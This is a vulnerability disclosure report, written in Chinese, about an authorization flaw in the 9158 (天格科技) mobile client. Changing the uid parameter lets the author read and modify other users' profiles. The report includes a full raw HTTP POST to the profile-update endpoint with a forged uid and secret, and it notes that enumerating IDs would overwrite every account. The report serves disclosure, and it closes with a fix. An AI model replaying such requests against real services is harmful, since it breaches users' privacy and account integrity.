天格科技某处越权漏洞可修改任意账户资料

问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。

下载方式位于http://mobile.9158.com/ 或直接91助手搜索9158

进入客户端，注册帐号。我们点击个人资料
 

我们看下数据包
 

发现了用户ID的参数，而在首页，我发现了9158公司VIP销售助理的ID
 

我们把ID改为30400试试
 

可以看到，成功读取了该销售助理的信息，包括不对外公开的登录用户名

那么我们继续尝试更改信息，点击保存


 

POST /user/updateInfo_new.aspx? HTTP/1.1
Host: mobile.9158.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Accept-Language: zh-cn
Accept: */*
Pragma: no-cache
Content-Length: 827
Connection: keep-alive
User-Agent: ChatRoom/1.0.7 CFNetwork/609.1.4 Darwin/13.0.0

--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="uid"

30400
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="secret"

d37ab3012c38a3ad1b96e90dffc1d0cc
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="city"

o??Y
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="name"

VIP?úê??úàí
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="gender"

0
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="birthday"

19910101
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="province"

???-
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw

我把用户名加了个句号，发现成功更改掉了。
 

gender是性别，默认不可更改，但是通过改数据可以实现，0为女，1为男。

至于uid不用解释了吧。



如果我把ID遍历一遍，那么全站的用户信息都会被改掉了。
 

修复方案：

添加接口认证